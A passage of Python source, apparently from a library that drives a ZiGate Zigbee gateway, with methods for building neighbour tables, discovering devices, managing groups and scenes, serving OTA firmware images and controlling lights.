                # depth 0 means directly attached to the coordinator
                neighbours.append((self.addr, n['addr'], n['lqi']))
            if is_router and n['addr'] not in nodes:
                LOGGER.debug('%s is a router, search for children', n['addr'])
                n2 = self._neighbours_table(n['addr'], nodes)
                if n2:
                    neighbours += n2
        index += data['count']
    return neighbours
def _neighbours_table2(self):
    '''
    Build the neighbours table by querying every known router-capable
    device once (non-recursive variant of _neighbours_table).

    Returns a deduplicated list of (parent, child, lqi) tuples.
    '''
    neighbours = []
    LOGGER.debug('Build neighbours tables')
    for addr in [self.addr] + [device.addr for device in self.devices]:
        if addr != self.addr:
            # Skip known Zigbee End Devices (not ZC or ZR)
            device = self._get_device(addr)
            if device and device.info and device.info.get('bit_field'):
                logical_type = device.info['bit_field'][-2:]
                if logical_type not in ('00', '01'):
                    LOGGER.debug('Skip gathering of neighbours for addr=%s (logical type=%s, device type=%s)',
                                 addr, logical_type, device.get_type())
                    continue
        LOGGER.debug('Gathering neighbours for addr=%s...', addr)
        r = self.lqi_request(addr, 0, True)
        # NOTE(review): r['status'] subscripts the response while the
        # rest of the file uses r.status - confirm the response type
        # supports item access.
        if not r or r['status'] != 0:
            LOGGER.error('Failed to request LQI for %s device', addr)
            continue
        data = r.cleaned_data()
        # entries = data['entries']
        for n in data['neighbours']:
            # bit_field
            # bit 0-1 = u2RxOnWhenIdle 0/1
            # bit 2-3 = u2Relationship 0/1/2
            # bit 4-5 = u2PermitJoining 0/1
            # bit 6-7 = u2DeviceType 0/1/2
            is_parent = n['bit_field'][2:4] == '00'
            if is_parent:
                entry = (n['addr'], addr, n['lqi'])
            else:
                entry = (addr, n['addr'], n['lqi'])
            # the same link can be reported from both ends
            if entry not in neighbours:
                neighbours.append(entry)
        LOGGER.debug('Gathered neighbours for addr=%s: %s', addr, neighbours)
    LOGGER.debug('Gathered neighbours table: %s', neighbours)
    return neighbours
def refresh_device(self, addr, full=False, force=False):
    '''
    Refresh a device's attributes.

    full : try to read all known attributes, not only the common ones.
    force : refresh even if the device was seen within the last hour.
    Does nothing when the address is unknown.
    '''
    target = self.get_device_from_addr(addr)
    if target:
        target.refresh_device(full, force)
def discover_device(self, addr, force=False):
    '''
    Advance the discovery state machine for one device.

    Each call performs at most one step (node descriptor request,
    then active endpoint request, then attribute discovery); later
    responses are expected to re-trigger it.
    force : wipe the discovery state and start over.
    '''
    LOGGER.debug('discover_device %s', addr)
    device = self.get_device_from_addr(addr)
    if not device:
        return
    if force:
        device.discovery = ''
        device.info['mac_capability'] = ''
        device.endpoints = {}
    if device.discovery:
        # discovery already finished (or tagged); nothing to do
        return
    typ = device.get_type()
    if typ:
        LOGGER.debug('Found type')
        if device.has_template():
            LOGGER.debug('Found template, loading it')
            device.load_template()
            return
    if not device.info.get('mac_capability'):
        LOGGER.debug('no mac_capability')
        self.node_descriptor_request(addr)
        return
    if not device.endpoints:
        LOGGER.debug('no endpoints')
        self.active_endpoint_request(addr)
        return
    if not typ:
        return
    if not device.load_template():
        # no template available: fall back to discovering every
        # attribute of every input cluster
        LOGGER.debug('Loading template failed, tag as auto-discovered')
        device.discovery = 'auto-discovered'
        for endpoint, values in device.endpoints.items():
            for cluster in values.get('in_clusters', []):
                self.attribute_discovery_request(addr, endpoint, cluster)
def _generate_addr(self):
    '''
    Draw a random 16-bit address that is not already used by a
    known device or group.
    '''
    while True:
        candidate = random.randint(1, 0xffff)
        if candidate not in self._devices and candidate not in self._groups:
            return candidate
@property
def groups(self):
    '''
    Known groups, keyed by group address; each value is a set of
    (device short address, endpoint) tuples.
    '''
    return self._groups
def get_group_for_addr(self, addr):
    '''
    Map the groups a device belongs to.

    Returns {endpoint: [group_addr, ...]} for every membership of
    the given short address.
    '''
    result = {}
    for group_addr, members in self._groups.items():
        for member_addr, endpoint in members:
            if member_addr == addr:
                result.setdefault(endpoint, []).append(group_addr)
    return result
def _add_group(self, cmd, addr, endpoint, group=None):
    '''
    Send an add-group command (0x0060 or 0x0065) and record the
    membership locally on success.

    group : group address; a random unused one is generated when
        omitted.
    Returns the group address as a 4-char hex string.
    '''
    addr_mode = 2
    addr = self.__addr(addr)
    if not group:
        group = self._generate_addr()
    else:
        group = self.__addr(group)
    src_endpoint = 1
    data = struct.pack('!BHBBH', addr_mode, addr,
                       src_endpoint, endpoint, group)
    r = self.send_data(cmd, data)
    group_addr = self.__haddr(group)
    # NOTE(review): assumes send_data returned a response object;
    # r.status would raise AttributeError on None - confirm.
    if r.status == 0:
        self.__add_group(group_addr, self.__haddr(addr), endpoint)
    return group_addr
def __add_group(self, group, addr, endpoint):
    '''
    Record (addr, endpoint) as a member of group, creating the
    member set on first use.
    '''
    members = self._groups.setdefault(group, set())
    members.add((addr, endpoint))
def __remove_group(self, group, addr, endpoint):
    '''
    Remove the (addr, endpoint) membership from a group.

    When group is None, the membership is removed from every known
    group.  A group that becomes empty is deleted entirely.
    '''
    if group is None:
        # snapshot the keys: the loop below may delete entries
        groups = list(self._groups.keys())
    else:
        groups = [group]
    for group in groups:
        if (addr, endpoint) in self._groups.get(group, set()):
            self._groups[group].remove((addr, endpoint))
        # drop the group entirely once its last member is gone
        if group in self._groups and len(self._groups[group]) == 0:
            del self._groups[group]
def _sync_group_membership(self, addr, endpoint, groups):
    '''
    Make the local group table match a device's reported membership.

    Adds (addr, endpoint) to every group in `groups` and removes that
    pair from every other known group.
    '''
    for group in groups:
        self.__add_group(group, addr, endpoint)
    to_remove = []
    for group in self._groups:
        if group not in groups:
            to_remove.append(group)
    # removal is deferred: __remove_group may delete dict entries
    for group in to_remove:
        self.__remove_group(group, addr, endpoint)
def add_group(self, addr, endpoint, group=None):
    '''
    Add the device endpoint to a group (message 0x0060).

    A group address is generated when none is given; the group
    address is returned.
    '''
    return self._add_group(0x0060, addr, endpoint, group)
def add_group_identify(self, addr, endpoint, group=None):
    '''
    Add-group-if-identifying (message 0x0065): the device only joins
    the group while it is in identify mode.

    A group address is generated when none is given; the group
    address is returned.
    '''
    return self._add_group(0x0065, addr, endpoint, group)
def view_group(self, addr, endpoint, group):
    '''
    View Group request (message 0x0061): ask the device whether the
    endpoint is a member of the given group.
    '''
    addr_mode = 2
    addr = self.__addr(addr)
    group = self.__addr(group)
    src_endpoint = 1
    data = struct.pack('!BHBBH', addr_mode, addr,
                       src_endpoint, endpoint, group)
    return self.send_data(0x0061, data)
def get_group_membership(self, addr, endpoint, groups=None):
    '''
    Get Group Membership request (message 0x0062).

    groups : list of group addresses to test; an empty list (or None,
        the new safe default) queries all memberships.
    '''
    # fix: replace the mutable default argument `groups=[]` with None
    # (same behavior, no shared-list pitfall)
    if groups is None:
        groups = []
    addr_mode = 2
    addr = self.__addr(addr)
    src_endpoint = 1
    length = len(groups)
    groups = [self.__addr(group) for group in groups]
    data = struct.pack('!BHBBB{}H'.format(length), addr_mode, addr,
                       src_endpoint, endpoint, length, *groups)
    return self.send_data(0x0062, data)
def remove_group(self, addr, endpoint, group=None):
    '''
    Remove the endpoint from a group (message 0x0063), or from all
    groups (message 0x0064) when no group is given.

    The local group table is updated when the device reports success.
    '''
    addr_mode = 2
    addr = self.__addr(addr)
    src_endpoint = 1
    # keep the original hex string: __remove_group needs it (None
    # means "all groups")
    group_addr = group
    if group is None:
        data = struct.pack('!BHBB', addr_mode, addr,
                           src_endpoint, endpoint)
        r = self.send_data(0x0064, data)
    else:
        group = self.__addr(group)
        data = struct.pack('!BHBBH', addr_mode, addr,
                           src_endpoint, endpoint, group)
        r = self.send_data(0x0063, data)
    # NOTE(review): assumes send_data returned a response object
    if r.status == 0:
        self.__remove_group(group_addr, self.__haddr(addr), endpoint)
    return r
def identify_device(self, addr, time_sec=5):
    '''
    Ask a known device to identify itself (blink) for time_sec
    seconds; the device picks its own destination endpoint.

    Raises KeyError when the address is unknown.
    '''
    self._devices[addr].identify_device(time_sec)
def identify_send(self, addr, endpoint, time_sec):
    '''
    Start identify (blink) on a device endpoint for time_sec seconds
    (message 0x0070, address mode 2 = short).
    '''
    addr = self.__addr(addr)
    data = struct.pack('!BHBBH', 2, addr, 1, endpoint, time_sec)
    return self.send_data(0x0070, data)
def identify_query(self, addr, endpoint):
    '''
    Ask a device endpoint whether it is currently identifying
    (message 0x0071, address mode 2 = short).
    '''
    addr = self.__addr(addr)
    data = struct.pack('!BHBB', 2, addr, 1, endpoint)
    return self.send_data(0x0071, data)
def view_scene(self, addr, endpoint, group, scene):
    '''
    View Scene request (message 0x00A0) for the given group/scene.
    '''
    addr = self.__addr(addr)
    group = self.__addr(group)
    data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
    return self.send_data(0x00A0, data)
def add_scene(self, addr, endpoint, group, scene, name, transition=1):
    '''
    Add Scene request (message 0x00A1).

    NOTE(review): `name` and `transition` are accepted but never
    packed into the payload - confirm against the 0x00A1 message
    specification.
    '''
    addr = self.__addr(addr)
    group = self.__addr(group)
    data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
    return self.send_data(0x00A1, data)
def remove_scene(self, addr, endpoint, group, scene=None):
    '''
    Remove Scene request (message 0x00A2), or Remove All Scenes
    (message 0x00A3) when no scene id is given.
    '''
    addr = self.__addr(addr)
    group = self.__addr(group)
    if scene is None:
        # no scene id in the payload: remove every scene of the group
        data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
        return self.send_data(0x00A3, data)
    data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
    return self.send_data(0x00A2, data)
def store_scene(self, addr, endpoint, group, scene):
    '''
    Store Scene request (message 0x00A4): save the endpoint's current
    state under the given group/scene ids.
    '''
    addr = self.__addr(addr)
    group = self.__addr(group)
    data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
    return self.send_data(0x00A4, data)
def recall_scene(self, addr, endpoint, group, scene):
    '''
    Recall Scene request (message 0x00A5): restore a previously
    stored scene.  (Docstring fixed: it previously said "Store
    scene".)
    '''
    addr = self.__addr(addr)
    group = self.__addr(group)
    data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
    return self.send_data(0x00A5, data)
def scene_membership_request(self, addr, endpoint, group):
    '''
    Scene Membership request (message 0x00A6): list the scenes a
    group has on this endpoint.
    '''
    addr = self.__addr(addr)
    group = self.__addr(group)
    data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
    return self.send_data(0x00A6, data)
def copy_scene(self, addr, endpoint, from_group, from_scene, to_group, to_scene):
    '''
    Copy Scene request (message 0x00A9): duplicate one group/scene
    pair onto another on the same endpoint.
    '''
    addr = self.__addr(addr)
    from_group = self.__addr(from_group)
    to_group = self.__addr(to_group)
    # the extra 0 is the copy-mode byte (single scene copy)
    data = struct.pack('!BHBBBHBHB', 2, addr, 1, endpoint, 0,
                       from_group, from_scene,
                       to_group, to_scene)
    return self.send_data(0x00A9, data)
def initiate_touchlink(self):
    '''
    Start a Touchlink commissioning attempt (message 0x00D0).
    '''
    return self.send_data(0x00D0)
def touchlink_factory_reset(self):
    '''
    Send a Touchlink factory reset (message 0x00D2).
    '''
    return self.send_data(0x00D2)
def identify_trigger_effect(self, addr, endpoint, effect="blink"):
    '''
    Trigger an identify effect (message 0x00E0).

    Unknown effect names silently fall back to 'blink'.
    effects available:
        - blink: Light is switched on and then off (once)
        - breathe: Light is switched on and off by smoothly increasing and then
          decreasing its brightness over a one-second period, and then this is repeated 15 times
        - okay: Colour light goes green for one second. Monochrome light flashes twice in one second.
        - channel_change: Colour light goes orange for 8 seconds. Monochrome light switches to
          maximum brightness for 0.5 s and then to minimum brightness for 7.5 s
        - finish_effect: Current stage of effect is completed and then identification mode is
          terminated (e.g. for the Breathe effect, only the current one-second cycle will be completed)
        - Stop effect: Current effect and identification mode are terminated as soon as possible
    '''
    effects = {
        'blink': 0x00,
        'breathe': 0x01,
        'okay': 0x02,
        'channel_change': 0x0b,
        'finish_effect': 0xfe,
        'stop_effect': 0xff
    }
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    if effect not in effects.keys():
        effect = 'blink'
    effect_variant = 0  # Current Zigbee standard doesn't provide any variant
    data = struct.pack('!B' + addr_fmt + 'BBBB', addr_mode, addr, 1, endpoint, effects[effect], effect_variant)
    return self.send_data(0x00E0, data)
def read_attribute_request(self, addr, endpoint, cluster, attributes,
                           direction=0, manufacturer_code=0):
    '''
    Read Attribute request (message 0x0100).

    attributes : a single attribute id or a list of ids; the ZiGate
        message carries at most 10 ids, so longer lists are sent in
        chunks.
    Returns None; responses arrive asynchronously.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    if not isinstance(attributes, list):
        attributes = [attributes]
    length = len(attributes)
    manufacturer_specific = manufacturer_code != 0
    # chunk: one request per group of up to 10 attribute ids
    for i in range(0, length, 10):
        sub_attributes = attributes[i: i + 10]
        sub_length = len(sub_attributes)
        data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}H'.format(sub_length), addr_mode, addr, 1,
                           endpoint, cluster,
                           direction, manufacturer_specific,
                           manufacturer_code, sub_length, *sub_attributes)
        self.send_data(0x0100, data)
def write_attribute_request(self, addr, endpoint, cluster, attributes,
                            direction=0, manufacturer_code=0):
    '''
    Write Attribute request (message 0x0110).

    attributes : a (attribute_id, attribute_type, value) tuple, or a
        list of such tuples.  attribute_type indexes the module-level
        DATA_TYPE table to find the struct format for the value.
    Returns None; responses arrive asynchronously.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    fmt = ''
    if not isinstance(attributes, list):
        attributes = [attributes]
    attributes_data = []
    for attribute_tuple in attributes:
        # per attribute: id (H), type (B), then the typed value
        data_type = DATA_TYPE[attribute_tuple[1]]
        fmt += 'HB' + data_type
        attributes_data += attribute_tuple
    length = len(attributes)
    manufacturer_specific = manufacturer_code != 0
    data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1,
                       endpoint, cluster,
                       direction, manufacturer_specific,
                       manufacturer_code, length, *attributes_data)
    self.send_data(0x0110, data)
def reporting_request(self, addr, endpoint, cluster, attributes,
                      direction=0, manufacturer_code=0, min_interval=1, max_interval=3600):
    '''
    Configure Reporting request (message 0x0120, waits for 0x8120).

    attributes : a (attribute_id, attribute_type) tuple or a list of
        such tuples.
    min_interval / max_interval : reporting bounds in seconds.
    When the device answers 0x8c on cluster 6 (On/Off does not
    support reporting) the device is switched to assumed state.
    Returns the response object.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    if not isinstance(attributes, list):
        attributes = [attributes]
    length = len(attributes)
    attribute_direction = 0
    timeout = 0
    change = 0
    fmt = ''
    attributes_data = []
    for attribute_tuple in attributes:
        # per attribute: direction, type, id, min, max, timeout, change
        fmt += 'BBHHHHB'
        attributes_data += [attribute_direction,
                            attribute_tuple[1],
                            attribute_tuple[0],
                            min_interval,
                            max_interval,
                            timeout,
                            change
                            ]
    manufacturer_specific = manufacturer_code != 0
    data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1, endpoint, cluster,
                       direction, manufacturer_specific,
                       manufacturer_code, length, *attributes_data)
    r = self.send_data(0x0120, data, 0x8120)
    # reporting not supported on cluster 6, supposed on/off attribute
    if r and r.status == 0x8c and r.cluster == 6:
        device = self._devices[r.addr]
        device.set_assumed_state()
    return r
def ota_load_image(self, path_to_file):
    '''
    Load a Zigbee OTA image file and send its header to the ZiGate
    (message 0x0500).

    Signed images (NGIS container) are unwrapped first.  On success
    the parsed header and the raw image bytes are kept in self._ota
    for the transfer; returns False on any validation failure, None
    otherwise.
    '''
    # Check that ota process is not active
    if self._ota['active'] is True:
        LOGGER.error('Cannot load image while OTA process is active.')
        self.get_ota_status()
        return
    # Try reading file from user provided path
    try:
        with open(path_to_file, 'rb') as f:
            ota_file_content = f.read()
    except OSError as err:
        LOGGER.error('{path}: {error}'.format(path=path_to_file, error=err))
        return False
    if ota_file_content.startswith(b'NGIS'):
        LOGGER.debug('Signed file, removing signature')
        # container stores the payload offsets at 0x10 (start) and
        # 0x18 (footer position), little-endian
        header_end = struct.unpack('<I', ota_file_content[0x10:0x14])[0]
        footer_pos = struct.unpack('<I', ota_file_content[0x18:0x1C])[0]
        ota_file_content = ota_file_content[header_end:footer_pos]
    # Ensure that file has 69 bytes so it can contain header
    if len(ota_file_content) < 69:
        LOGGER.error('OTA file is too short')
        return False
    # Read header data
    try:
        header_data = list(struct.unpack('<LHHHHHLH32BLBQHH', ota_file_content[:69]))
    except struct.error:
        LOGGER.exception('Header is not correct')
        return False
    # Fix header str
    # First replace null characters from header str to spaces
    for i in range(8, 40):
        if header_data[i] == 0x00:
            header_data[i] = 0x20
    # Reconstruct header data
    header_data_compact = header_data[0:8] + [header_data[8:40]] + header_data[40:]
    # Convert header data to dict
    header_headers = [
        'file_id', 'header_version', 'header_length', 'header_fctl', 'manufacturer_code', 'image_type',
        'image_version', 'stack_version', 'header_str', 'size', 'security_cred_version', 'upgrade_file_dest',
        'min_hw_version', 'max_hw_version'
    ]
    header = dict(zip(header_headers, header_data_compact))
    # Check that size from header corresponds to file size
    if header['size'] != len(ota_file_content):
        LOGGER.error('Header size({header}) and file size({file}) does not match'.format(
            header=header['size'], file=len(ota_file_content)
        ))
        return False
    destination_address_mode = 0x02
    destination_address = 0x0000
    # NOTE(review): the pack format uses a signed 'l' where the header
    # was unpacked with unsigned 'L' (file_id) - confirm file ids stay
    # below 2**31.
    data = struct.pack('!BHlHHHHHLH32BLBQHH', destination_address_mode, destination_address, *header_data)
    response = self.send_data(0x0500, data)
    # If response is success place header and file content to variable
    if response.status == 0:
        LOGGER.info('OTA header loaded to server successfully.')
        self._ota_reset_local_variables()
        self._ota['image']['header'] = header
        self._ota['image']['data'] = ota_file_content
    else:
        LOGGER.warning('Something wrong with ota file header.')
def _ota_send_image_data(self, request):
    '''
    Answer a client image-block request with the next chunk of the
    loaded OTA image (message 0x0502).

    request : decoded block-request fields (addr, endpoint, sequence,
        file_offset, max_data_size, image version/type/manufacturer).
    Silently returns when no image is loaded or the request does not
    match the loaded image header.
    '''
    errors = False
    # Ensure that image is loaded using ota_load_image
    if self._ota['image']['header'] is None:
        LOGGER.error('No header found. Load image using ota_load_image(\'path_to_ota_image\')')
        errors = True
    if self._ota['image']['data'] is None:
        LOGGER.error('No data found. Load image using ota_load_image(\'path_to_ota_ota\')')
        errors = True
    if errors:
        return
    # Compare received image data to loaded image
    errors = False
    if request['image_version'] != self._ota['image']['header']['image_version']:
        LOGGER.error('Image versions do not match. Make sure you have correct image loaded.')
        errors = True
    if request['image_type'] != self._ota['image']['header']['image_type']:
        LOGGER.error('Image types do not match. Make sure you have correct image loaded.')
        errors = True
    if request['manufacturer_code'] != self._ota['image']['header']['manufacturer_code']:
        LOGGER.error('Manufacturer codes do not match. Make sure you have correct image loaded.')
        errors = True
    if errors:
        return
    # Mark ota process started
    if self._ota['starttime'] is False and self._ota['active'] is False:
        self._ota['starttime'] = datetime.datetime.now()
        self._ota['active'] = True
        self._ota['transfered'] = 0
        self._ota['addr'] = request['addr']
    source_endpoint = 0x01
    ota_status = 0x00  # Success. Using value 0x01 would make client to request data again later
    # Get requested bytes from ota file
    self._ota['transfered'] = request['file_offset']
    end_position = request['file_offset'] + request['max_data_size']
    ota_data_to_send = self._ota['image']['data'][request['file_offset']:end_position]
    data_size = len(ota_data_to_send)
    # unpack to individual bytes so they can be *-spread into pack
    ota_data_to_send = struct.unpack('<{}B'.format(data_size), ota_data_to_send)
    # Giving user feedback of ota process
    self.get_ota_status(debug=True)
    data = struct.pack('!BHBBBBLLHHB{}B'.format(data_size), request['address_mode'], self.__addr(request['addr']),
                       source_endpoint, request['endpoint'], request['sequence'], ota_status,
                       request['file_offset'], self._ota['image']['header']['image_version'],
                       self._ota['image']['header']['image_type'],
                       self._ota['image']['header']['manufacturer_code'],
                       data_size, *ota_data_to_send)
    self.send_data(0x0502, data, wait_status=False)
def _ota_handle_upgrade_end_request(self, request):
    '''
    Finish an OTA transfer: log the client-reported end status and
    reset the local OTA state.

    Does nothing when no transfer is active.
    '''
    if self._ota['active'] is True:
        status = request['status']
        # Handle error statuses
        if status == 0x00:
            LOGGER.info('OTA image upload finnished successfully in {seconds}s.'.format(
                seconds=(datetime.datetime.now() - self._ota['starttime']).seconds))
        elif status == 0x95:
            LOGGER.warning('OTA aborted by client')
        elif status == 0x96:
            LOGGER.warning('OTA image upload successfully, but image verification failed.')
        elif status == 0x99:
            LOGGER.warning('OTA image uploaded successfully, but client needs more images for update.')
        else:
            # fix: the original `elif status != 0x00` was always true
            # here (0x00 is handled first), so a plain else is clearer
            LOGGER.warning('Some unexpected OTA status {}'.format(status))
        # Reset local ota variables
        self._ota_reset_local_variables()
def _ota_reset_local_variables(self):
    '''
    Reset the OTA bookkeeping to its idle state: no image loaded,
    no transfer in progress.
    '''
    idle_state = {
        'image': {'header': None, 'data': None},
        'active': False,
        'starttime': False,
        'transfered': 0,
        'addr': None,
    }
    self._ota = idle_state
def get_ota_status(self, debug=False):
    '''
    Log progress of the running OTA transfer: bytes sent, percentage,
    elapsed time and a remaining-time estimate.

    debug : log at DEBUG level instead of INFO.
    '''
    if self._ota['active']:
        image_size = len(self._ota['image']['data'])
        time_passed = (datetime.datetime.now() - self._ota['starttime']).seconds
        try:
            # linear extrapolation from bytes transferred so far
            time_remaining = int((image_size / self._ota['transfered']) * time_passed) - time_passed
        except ZeroDivisionError:
            # nothing transferred yet: no estimate possible
            time_remaining = -1
        message = 'OTA upgrade address {addr}: {sent:>{width}}/{total:>{width}} {percentage:.3%}'.format(
            addr=self._ota['addr'], sent=self._ota['transfered'], total=image_size,
            percentage=self._ota['transfered'] / image_size, width=len(str(image_size)))
        message += ' time elapsed: {passed}s Time remaining estimate: {remaining}s'.format(
            passed=time_passed, remaining=time_remaining
        )
    else:
        message = "OTA process is not active"
    if debug:
        LOGGER.debug(message)
    else:
        LOGGER.info(message)
def ota_image_notify(self, addr, destination_endpoint=0x01, payload_type=0):
    """
    Send image available notification to client. This will start ota process.

    :param addr: 4-char hex short address of the client
    :param destination_endpoint: endpoint to notify
    :param payload_type: 0, 1, 2, 3 - how specific the notification is:
        0 wildcards version, type and manufacturer; 1 wildcards
        version and type; 2 wildcards version only; 3 sends the
        loaded header values unchanged.
    :type payload_type: int
    :return: False when no ota image is loaded, None otherwise
    """
    # Get required data from ota header
    if self._ota['image']['header'] is None:
        LOGGER.warning('Cannot read ota header. No ota file loaded.')
        return False
    image_version = self._ota['image']['header']['image_version']
    image_type = self._ota['image']['header']['image_type']
    manufacturer_code = self._ota['image']['header']['manufacturer_code']
    source_endpoint = 0x01
    destination_address_mode = 0x02  # uint16
    destination_address = self.__addr(addr)
    query_jitter = 100
    if payload_type == 0:
        image_version = 0xFFFFFFFF
        image_type = 0xFFFF
        manufacturer_code = 0xFFFF
    elif payload_type == 1:
        image_version = 0xFFFFFFFF
        image_type = 0xFFFF
    elif payload_type == 2:
        image_version = 0xFFFFFFFF
    data = struct.pack('!BHBBBLHHB', destination_address_mode, destination_address,
                       source_endpoint, destination_endpoint, 0,
                       image_version, image_type, manufacturer_code, query_jitter)
    self.send_data(0x0505, data)
def attribute_discovery_request(self, addr, endpoint, cluster,
                                direction=0, manufacturer_code=0):
    '''
    Attribute Discovery request (message 0x0140): ask a cluster for
    its attribute list, starting at attribute 0, up to 255 entries.
    '''
    addr = self.__addr(addr)
    manufacturer_specific = manufacturer_code != 0
    data = struct.pack('!BHBBHHBBHB', 2, addr, 1, endpoint, cluster,
                       0, direction, manufacturer_specific,
                       manufacturer_code, 255)
    self.send_data(0x0140, data)
def available_actions(self, addr, endpoint=None):
    '''
    List the actions a device endpoint supports (onoff, move, lock,
    ...).

    Returns None when the address is unknown.
    '''
    target = self.get_device_from_addr(addr)
    if target:
        return target.available_actions(endpoint)
@register_actions(ACTIONS_ONOFF)
def action_onoff(self, addr, endpoint, onoff, on_time=0, off_time=0, effect=0, gradient=0):
    '''
    On/Off action (messages 0x0092/0x0093/0x0094).

    onoff : 0 - OFF
            1 - ON
            2 - Toggle
    on_time : timed on in sec
    off_time : timed off in sec
    effect : effect id
    gradient : effect gradient
    Note that timed onoff and effect are mutually exclusive.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
    cmd = 0x0092
    if on_time or off_time:
        cmd = 0x0093
        data += struct.pack('!HH', on_time, off_time)
    elif effect:
        cmd = 0x0094
        # NOTE(review): this branch hard-codes an 'H' address field
        # even when addr_mode selected an IEEE ('Q') address - confirm
        data = struct.pack('!BHBBBB', addr_mode, addr, 1, endpoint, effect, gradient)
    return self.send_data(cmd, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level(self, addr, endpoint, onoff=OFF, mode=0, rate=0):
    '''
    Move level continuously (message 0x0080).

    mode : 0 up, 1 down.
    rate : level units per second.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    data = struct.pack('!B' + addr_fmt + 'BBBBB', addr_mode, addr, 1, endpoint, onoff, mode, rate)
    return self.send_data(0x0080, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level_onoff(self, addr, endpoint, onoff=OFF, level=0, transition=1):
    '''
    Move to level with on/off (message 0x0081).

    level : 0 - 100 percent, rescaled to the 0-254 wire range.
    transition : transition time in seconds.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    # percent -> 0..254 wire units
    level = int(level * 254 // 100)
    data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint, onoff, level, transition)
    return self.send_data(0x0081, data)
@register_actions(ACTIONS_LEVEL)
def action_move_step(self, addr, endpoint, onoff=OFF, step_mode=0, step_size=0, transition=1):
    '''
    Step the level by a fixed amount (message 0x0082).

    step_mode : step direction.
    step_size : size of one step.
    transition : transition time in seconds.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    data = struct.pack('!B' + addr_fmt + 'BBBBBH', addr_mode, addr, 1, endpoint, onoff,
                       step_mode, step_size, transition)
    return self.send_data(0x0082, data)
@register_actions(ACTIONS_LEVEL)
def action_move_stop_onoff(self, addr, endpoint, onoff=OFF):
    '''
    Stop a running level move, with on/off (message 0x0084).
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
    return self.send_data(0x0084, data)
@register_actions(ACTIONS_HUE)
def action_move_hue(self, addr, endpoint, hue, direction=0, transition=1):
    '''
    Move to hue (message 0x00B0).

    hue : 0-360 in degrees, rescaled to the 0-254 wire range.
    direction : 0 shortest, 1 longest, 2 up, 3 down.
    transition : transition time in seconds.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    # degrees -> 0..254 wire units
    hue = int(hue * 254 // 360)
    data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
                       hue, direction, transition)
    return self.send_data(0x00B0, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_saturation(self, addr, endpoint, hue, saturation=100, transition=1):
    '''
    Move to hue and saturation (message 0x00B6).

    hue : 0-360 in degrees.
    saturation : 0-100 in percent.
    transition : transition time in seconds.
    Both values are rescaled to the 0-254 wire range.
    '''
    addr = self._translate_addr(addr)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
    addr = self.__addr(addr)
    hue = int(hue * 254 // 360)
    saturation = int(saturation * 254 // 100)
    data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
                       hue, saturation, transition)
    return self.send_data(0x00B6, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_hex(self, addr, endpoint, color_hex, transition=1):
    '''
    Move to a hue given as an RGB hex string ('#ffffff').

    Convenience wrapper: converts to RGB then delegates to
    action_move_hue_rgb.  transition is in seconds.
    '''
    rgb = hex_to_rgb(color_hex)
    return self.action_move_hue_rgb(addr, endpoint, rgb, transition)
@register_actions(ACTIONS_HUE)
def action_move_hue_rgb(self, addr, endpoint, rgb, transition=1):
    '''
    Move to a hue given as normalised RGB, e.g. (1.0, 1.0, 1.0).

    Sets the brightness (value) immediately via
    action_move_level_onoff, then moves hue and saturation.
    transition is in seconds.
    '''
    hue, saturation, level = colorsys.rgb_to_hsv(*rgb)
    # convert the 0..1 HSV components to the units the actions expect
    hue = int(hue * 360)
    saturation = int(saturation * 100)
    level = int(level * 100)
    self.action_move_level_onoff(addr, endpoint, ON, level, 0)
    return self.action_move_hue_saturation(addr, endpoint, hue, saturation, transition)
@register_actions(ACTIONS_COLOR)
def action_move_colour(self, addr, endpoint, x, y, transition=1):
    '''
    Move to CIE colour coordinates x, y (message 0x00B7).

    x, y : integer 0-65536, or float 0-1.0 (floats are rescaled).
    transition : transition time in seconds.
    NOTE(review): a float of exactly 1.0 scales to 65536, which
    overflows the 'H' (16-bit) pack field - confirm intended range.
    '''
    addr = self._translate_addr(addr)
    if isinstance(x, float) and x <= 1:
        x = int(x * 65536)
    if isinstance(y, float) and y <= 1:
        y = int(y * 65536)
    addr_mode, addr_fmt = self._choose_addr_mode(addr)
